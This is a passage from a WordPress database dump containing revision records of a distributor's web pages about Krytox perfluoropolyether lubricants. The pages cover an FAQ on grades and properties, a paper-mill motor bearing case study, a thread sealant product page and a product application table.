Lubricants Plastics and Elastomer Compatibility.”\n\n<strong>Is Krytox oil hard to clean up?</strong>\n\nThe very characteristic that makes Krytox lubricant work as well as it does, i.e., its inertness to chemical attack, also makes it insoluble in most common solvents and is why it cannot be washed out with water. A small amount of a fluorinated solvent such as Krytox Solvent, Krytox HC Plus Cleaner, or Vertrel XF on a rag or towel will easily remove remaining traces of Krytox. For additional information, please request “Krytox HC Plus Cleaner” and “Krytox Solvent.”\n\n<strong>What is the shelf life of Krytox lubricants?</strong>\n\nKrytox greases and oils with no additives have an indefinite shelf life if left unopened and stored in a clean, dry location. The service life of Krytox is difficult to predict because there are so many variables. Testing\ndocuments Krytox grease at 200 ºC (392 °F) and 10,000 rpm for over 5,000 hours in an ASTM D3336 life test, and the bearings did not fail. For more detailed information, please ask for “Shelf Life Profile of Krytox\nLubricants.”\n\n<strong>What lubrication equipment can I use with Krytox grease?</strong>\n\nGenerally, any lubrication equipment manufacturer’s gun or pump that fits a standard grease cartridge or grease bucket should work. For more information about equipment grades and a discussion of grease fittings,\nplease ask for “Equipment Selection for Applying Krytox Lubricants.”\n\n<strong>TO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Krytox Lubricants, Greases and Oils"]\n\nThis Krytox FAQ is for educational purposes. To find your appropriate grade of Krytox please contact us or <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here to visit our Krytox database.</a>\n\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox Frequently Asked Questions (FAQ)', '', 'inherit', 'closed', 'closed', '', '2277-autosave-v1', '', '', '2016-10-12 20:07:52', '2016-10-12 20:07:52', '', 2277, 'https://www.miller-stephenson.com/2277-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2602, 2, '2016-10-12 20:08:49', '2016-10-12 20:08:49', '<h1><span style="font-size: 120%;"><strong>Krytox FAQ</strong></span></h1>\r\n<h2><span style="font-size: 110%;"><strong>Introduction to Krytox Lubricants</strong></span></h2>\r\n<h4><strong>What is Krytox FAQ?</strong></h4>\r\nKrytox is the Chemours brand name for a range of clean, specialty synthetic lubricating materials available in numerous grades for a wide range of applications. Krytox lubricants have become the product of choice where extremely high or low temperature performance, nonflammability, oxygen compatibility, and resistance to aggressive chemicals are required. In this Krytox FAQ we discuss all the uses, applications and specifications of Krytox.\r\n<h4><strong>What are the primary differences in Krytox oils?</strong></h4>\r\n<ul>\r\n 	<li>Krytox XHT oils have additional treatment to make them more thermally stable at temperatures over 300 °C (572 °F) and have very high viscosity to withstand the temperatures and provide adequate lubrication.</li>\r\n 	<li>Krytox aerospace oils have more strict volatility specifications and are a narrower distillation than GPL oils.</li>\r\n 	<li>Krytox vacuum pump fluids are distilled to give an excellent vapor pressure and are designed for specific OEM pumps.</li>\r\n 	<li>Krytox linear oils have a better viscosity index and operate over a wider temperature range.</li>\r\n 	<li>Krytox GPL oils are formulated to provide a cost effective base oil for industrial applications.</li>\r\n</ul>\r\n<h4><strong>Does Krytox contain silicone?</strong></h4>\r\nNo. Krytox oils and greases do not contain any silicones,and there are no silicones used in processing.\r\n<h4><strong>What are the different grades of Krytox GPL lubricants and their typical applications?</strong></h4>\r\n<ul>\r\n 	<li>The Krytox GPL 10X oil /20X grease series contain no additives and can be used on components that come in contact with most chemicals typically used in industry. Typical applications include valves or bearings, seal barrier fluids, instruments, and oxygen systems.</li>\r\n 	<li>The Krytox GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or extremely heavily loaded applications.</li>\r\n 	<li>The Krytox GPL 22X series contains sodium nitrite corrosion/anti-wear inhibitor; it also improves load carrying performance and is ideal for corrosive environments. Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general-purpose bearings.</li>\r\n 	<li>The Krytox GPL 29X greases have EP and anticorrosion additives, and have been formulated for applications that need both high load carrying capacity and anti-corrosion protection.</li>\r\n 	<li>The Krytox GPL 2EX lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anti-corrosion additive.</li>\r\n</ul>\r\n<h4><strong>What is Krytox made of?</strong></h4>\r\nKrytox fluorinated oils are a series of low molecular weight, fluorine end-capped, homopolymers of hexafluoropropylene epoxide. The polymer chain is completely saturated and contains only the elements carbon, oxygen, and fluorine; hydrogen is not present. On a weight basis, typical Krytox oil contains 21.6% carbon, 9.4% oxygen, and 69.0% fluorine.\r\n<h4><span style="font-size: 110%;"><strong>Krytox FAQ Applications</strong></span></h4>\r\n<h4><strong>Where can Krytox lubricants be used?</strong></h4>\r\nKrytox lubricants can be used in applications where nonflammability, oxygen compatibility, materials compatibility, high temperature stability, and resistance to aggressive chemicals are requirements. Some examples include:\r\n<ul>\r\n 	<li><strong>Automotive</strong>: Wheel bearing grease, CV joint grease, universal joint grease, fan clutch bearing grease, emission air pump grease, spark plug boot lubricant, weather stripping lubricant, sunroof seal lubricant, clutch throw out bearing grease, ABS system grease, paint plant conveyor bearings, paint spray system valve lubrication, gasoline pump bearings, windshield wiper motors, oil pressure sensors, truck window lift mechanism, sintered bearings in motors, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls</li>\r\n 	<li><strong>Aviation</strong>: Fuel resistant grease, oxygen compatible grease, ventilation fan bearing grease, cruise missile rear main bearing lubricant, starter bearing grease, emergency generator bearing grease, missile launch\r\nplatform gear lubricant, space shuttle lubricant, sealant</li>\r\n 	<li><strong>Pumps</strong>: Vacuum pump fluid for corrosive and hazardous service, bearing grease for chemical pumps, O-ring lubricant, barrier fluid between double mechanical seals • Industrial: Corrugator and paper machine bearings, aluminum can manufacturing bearings, vacuum sputtering machines, welding machines, gear oil, linear bearing lubricant, high temperature fans, clean rooms, chlorine service, textile equipment, tenter frames, high speed motors, instrument bearings, sealed-for-life motors, conveyor system in glass and aluminum plants, textile calender roll bearings, brick kiln car bearings, film blowing machines</li>\r\n 	<li><strong>Nuclear</strong>: Submerged sump pump bearings, containment cooling fans, snubbers, control rod drive mechanism fan motors</li>\r\n 	<li><strong>Valves</strong>: Lubricant for valve stem packing, relief valve lubricant, O-ring lubricant, steam turbine control valves, low emissions valve stem packing lubricant</li>\r\n 	<li><strong>Miscellaneous</strong>: Anti-seize lubricant, bolt thread lubricant, water purifier lubricant, self-contained breathing apparatus lubricant, cryogenic lubricant, vacuum system sealant, drive chains, hydraulic fluids, instrument barrier fluids, heat transfer fluids, geothermal system grease, mold release agent, fishing reel grease, industrial toast making oven conveyor bearings, windmill gearboxes, glove curing conveyor</li>\r\n</ul>\r\n<h4><strong>What is the NLGI consistency of Krytox grease grades?</strong></h4>\r\nGreases are formed by mixing the base oil with a thickener to form a grease. Krytox greases use a special high-thickening efficiency, low molecular weight polytetrafluoroethylene (PTFE) with very small particle sizes as their thickener. This is one of the most thermally stable thickeners for high-temperature, long-term greases. The higher thickening efficiency of the special PTFE thickener allows Chemours to formulate grease to\r\nmaximize oil content for improved grease performance.\r\nGreases can be formulated with different viscosity oils to handle different temperatures and load conditions. High viscosity oils can be used in greases for high temperatures, heavy loads, or low speed applications.\r\nLow viscosity oils can be used in greases where low temperature properties are important or speeds are higher. Lower amounts of thickener form softer or more fluid-like greases. Higher solid levels form harder, stiffer\r\ngreases. Additives are often added to the grease to enhance anti-corrosion protection, raise load carrying ability, or help reduce wear.\r\nOur standard grease grade is NLGI Grade 2; however, upon request, we produce NLGI Grades 000 through 6.\r\n<h4><strong>Do I need to do anything special before using Krytox in bearings?</strong></h4>\r\nBefore adding Krytox grease to a bearing, the bearing should be cleaned of all existing greases, oils, or preservative oils used during storage. If hydrocarbon oils are left in a bearing, the oils can form carbon deposits at high temperatures that may accelerate bearing failure. Please ask for “New Bearing Preparation with Krytox Lubricants” for the recommended cleaning and repacking procedure, as well as guidance on how much grease to use and speed considerations.\r\n<h4><strong>Is ongoing lubrication required once we’ve begun using Krytox?</strong></h4>\r\nRe-lubrication of bearings may be required: typically every 1–3 months for corrugators, depending on the equipment operating temperature. For other applications, re-lubrication intervals can be from months to years or\r\npotentially never in the case of sealed systems.\r\n<h4><strong>Can I mix Krytox grease with other greases?</strong></h4>\r\nThe performance benefits of Krytox grease will not be achieved if Krytox is mixed with a non-perfluoropolyether (PFPE) grease. The performance of the grease mixture will be limited by the properties of the non-PFPE grease in the mixture. Krytox grease will not react with the other grease, nor cause decomposition or any hazardous reactions. The mixing tests that Chemours has done have shown that the mixture sometimes softens up by about one penetration grade when it is heated up. This normally will not be enough change to cause any significant problems.\r\nThe Krytox grease will not stop the other lubricant from breaking down from heat and oxidation. It is likely that the additives in the hydrocarbon grease have coated the bearing surfaces, and the Krytox grease will not be able to adhere to the bearing—so most of it might get thrown out of the bearing.\r\n<h4><span style="font-size: 110%;"><strong>Characteristics of Krytox FAQ</strong></span></h4>\r\n<h4><strong>What approvals and certifications do Krytox lubricants have?</strong></h4>\r\nKrytox lubricants have the following certifications:\r\n<ul>\r\n 	<li>ISO 9001 Certified Quality Management System</li>\r\n 	<li>ISO 14001 Certified Environmental Management System</li>\r\n</ul>\r\nIn addition, certain grades have the following approvals:\r\n<ul>\r\n 	<li>MIL-Spec PRF-27617 approved grades for aerospace and aviation use</li>\r\n 	<li>NSF H-1 food grade lubricants approved for incidental food contact</li>\r\n 	<li>Independently tested and confirmed for LOX and GOX use by major oxygen manufacturers and certification authorities</li>\r\n</ul>\r\nAre Krytox lubricants flammable?\r\n\r\nNo. Krytox lubricants are not combustible, nor do they ignite.\r\n<h4><strong>How stable is Krytox when exposed to chemicals?</strong></h4>\r\nKrytox PFPE oils and greases thickened with PTFE exhibit exceptional chemical stability. Krytox oils and greases will not react with most chemicals (with the exception of Lewis acids and alkali metals) and other\r\nlubricants, nor cause them to degrade. Krytox performance lubricants are not only resistant to oxygen and reactive gases, but they are inert to virtually all chemicals commonly used in most industries. For further information, please ask for “Krytox Lubricants: Chemical Stability.”\r\n<h4><strong>Is Krytox compatible with nonmetallic materials?</strong></h4>\r\nYes. Krytox oils and greases have been used as plastic or elastomer component lubricants for over 40 years. For more specific information, please ask for “Krytox Lubricants Plastics and Elastomer Compatibility.”\r\n<h4><strong>Is Krytox oil hard to clean up?</strong></h4>\r\nThe very characteristic that makes Krytox lubricant work as well as it does, i.e., its inertness to chemical attack, also makes it insoluble in most common solvents and is why it cannot be washed out with water. A small amount of a fluorinated solvent such as Krytox Solvent, Krytox HC Plus Cleaner, or Vertrel XF on a rag or towel will easily remove remaining traces of Krytox. For additional information, please request “Krytox HC Plus Cleaner” and “Krytox Solvent.”\r\n<h4><strong>What is the shelf life of Krytox lubricants?</strong></h4>\r\nKrytox greases and oils with no additives have an indefinite shelf life if left unopened and stored in a clean, dry location. The service life of Krytox is difficult to predict because there are so many variables. Testing\r\ndocuments Krytox grease at 200 ºC (392 °F) and 10,000 rpm for over 5,000 hours in an ASTM D3336 life test, and the bearings did not fail. For more detailed information, please ask for “Shelf Life Profile of Krytox\r\nLubricants.”\r\n<h4><strong>What lubrication equipment can I use with Krytox grease?</strong></h4>\r\nGenerally, any lubrication equipment manufacturer’s gun or pump that fits a standard grease cartridge or grease bucket should work. For more information about equipment grades and a discussion of grease fittings,\r\nplease ask for “Equipment Selection for Applying Krytox Lubricants.”\r\n<h4><strong>TO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Krytox Lubricants, Greases and Oils"]</h4>\r\nThis Krytox FAQ is for educational purposes. To find your appropriate grade of Krytox please contact us or <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here to visit our Krytox database.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox Frequently Asked Questions (FAQ)', '', 'inherit', 'closed', 'closed', '', '2277-revision-v1', '', '', '2016-10-12 20:08:49', '2016-10-12 20:08:49', '', 2277, 'https://www.miller-stephenson.com/2277-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2603, 2, '2016-10-12 20:10:24', '2016-10-12 20:10:24', '<h1><strong>Krytox™ Lube For Life</strong></h1>\r\n<strong>A North American company improves equipment reliability by switching lubricants and joining the Lube for Life program.</strong>\r\n\r\nA major pulp and paper mill located in Western Canada wanted to improve the average operating life of its 3000 electric motors operating in a harsh environment without incurring additional costs for equipment or manpower.\r\n<h4><strong>The Challenge</strong></h4>\r\nFor this application, the pulp and paper mill needed a ball bearing lubricant that could last the expected lifetime of their motors without the implementation of a cost prohibitive re-lubrication process. The mill\'s reliability superintendent knew he could not afford to implement a system that relied upon ongoing re-greasing because of the additional equipment needed, unavoidable downtime and labor costs. However, he also realized that a more sophisticated greasing program was necessary to meet the increasing recommendations of industry experts and to avoid rebuilding and/or replacing failed motors.\r\n<h4><strong>The Solutions</strong></h4>\r\nAfter researching available options, the reliability superintendent turned to Krytox™ for help. Working with the Krytox™ technical service team, the mill implemented the use of Krytox™ grease AUT 2E45 on 100 motors as a pilot and the mill is now able to run its electric motors for their expected lifetime with no bearing failures attributed to lubrication. Switching to Krytox™ lubricants also avoided having to implement a re-lubrication process all together, saving significant manpower and downtime. The end result was a cost-effective, simplified process that not only met, but exceeded their expectations.\r\n<h4><strong>Key Advantages</strong></h4>\r\n<ul>\r\n 	<li>Using Krytox™ lubricant AUT 2E45, the pulp and paper mill was able to extend the service life of its electric motors and help ensure long-term reliability of the motor\'s ball bearings.</li>\r\n 	<li>Krytox™ lubricant AUT 2E45 enabled the mill to avoid implementing a cost re-lubrication process.</li>\r\n 	<li>Krytox™ lubricants can be used in other electric motor applications to prevent oxidation and ensure no lubricant gum-up or breakdown for the lifetime of the motor. Excellent film-forming viscosity also enables the electric motors to spin with less resistant friction, leading to less maintenance and fewer bearing replacements.</li>\r\n</ul>\r\nKrytox™ greases offer the potential for lube for life lubrication in demanding electrical motor service. Krytox™ greases are non-oxidizing, water resistant, non-flammable and chemically inert.\r\n\r\nKrytox™ greases contain perfluoropolyether (PFPE) oil and a polytetrafluoroethylene (PTFE) thickener. The PFPE oil and PTFE thickener will not oxidize and gum up like ordinary synthetic or hydrocarbon-based greases. Krytox™ greases are recommended by many major bearing manufacturers for long-life lubrication in severe applications. The superior film-forming capability of Krytox™ greases provide a thicker oil layer and reduce wear. Krytox™ greases are compatible with metals and most seal materials, but require removal of all old lubrications from the motor bearings before application.\r\n\r\n[ux_product_categories ids="37" number="10"]\r\n\r\nTo learn more about Krytox™ Lube for Life greases please click <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">this link.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox Lube For Life', '', 'inherit', 'closed', 'closed', '', '1117-revision-v1', '', '', '2016-10-12 20:10:24', '2016-10-12 20:10:24', '', 1117, 'https://www.miller-stephenson.com/1117-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2604, 2, '2016-10-12 20:11:55', '2016-10-12 20:11:55', '<h1><strong>Krytox TS4 Thread Sealant</strong></h1>\r\n<strong><span style="font-size: 115%;">Sealants and tape often expand under pressure. This requires plants to halt operations for re-application, or worse, address expensive thread damages. Krytox TS4 is a great replacement to avoid constant maintenance. </span></strong>\r\n<p id="custom_1_text_chmsContentCustomTextItem_1_BodyParagraph_1" class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_1" class="chmsParagraph">High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations, even in extreme environments.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_2" class="chmsParagraph">Proper application and a high quality sealant, like Krytox TS4, is the solution for demanding applications, and can help reduce maintenance costs and operational halts.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly">Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly. Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.</p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_3" class="chmsParagraph">Learn more about Krytox TS4 Thread Sealant, including how to properly apply:</span></p>\r\nhttps://www.youtube.com/watch?v=XxJbQOWtIG0\r\n<h4><strong>Key Benefits of Kytox™ TS4:</strong></h4>\r\n<ul>\r\n 	<li>Can be re-applied over existing Kytox™ thread sealant</li>\r\n 	<li>Clings and will not shred or tear on assembly/disassembly</li>\r\n 	<li>Cannot plug or restrict critical piping, valves or instruments</li>\r\n 	<li>Non-reactive, non-toxic, nonflammable, non-corrosive</li>\r\n 	<li>Compatible with most seal, O-ring and valve polymers</li>\r\n 	<li>No VOC content or hydrocarbon</li>\r\n 	<li>Operating temperature range of –54–149 ºC (–65–300 ºF).</li>\r\n 	<li>Cost-effective- only a small amount of sealant needed</li>\r\n 	<li>Fast and easy to apply</li>\r\n</ul>\r\n<h4><strong>Suggested Krytox TS4 Thread Sealant Application Procedures:</strong></h4>\r\n<ul>\r\n 	<li>Clean all pipe and fitting threads with a non-chlorinated solvent to remove cutting/protective oil and chase threads with stiff wire brush to remove burrs, debris, and old sealant (PTFE tape, pipe dope, anaerobic resin, etc.).</li>\r\n 	<li>Check pipe and fittings against ASNI/ASME guideline B.20.1-1983 to meet specifications for proper fit and engagement.</li>\r\n 	<li>Construct piping systems following all applicable ANSI/ ASME codes.</li>\r\n 	<li>Apply Krytox TS4 to fill the male threads evenly, up to the recommended engagement length from the ANSI/ ASME guideline. DO NOT OVERTIGHTEN.</li>\r\n</ul>\r\n<h4><strong>Recommended Product:</strong></h4>\r\n[ux_product_categories ids="165" number="10"]\r\n\r\nTo learn more about TS4 please visit <a href="https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/">https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/</a>', 'TS4 Thread Sealant', '', 'inherit', 'closed', 'closed', '', '2056-revision-v1', '', '', '2016-10-12 20:11:55', '2016-10-12 20:11:55', '', 2056, 'https://www.miller-stephenson.com/2056-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2605, 2, '2016-10-12 20:13:43', '2016-10-12 20:13:43', '<h3>Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"> XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox LVP</td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling 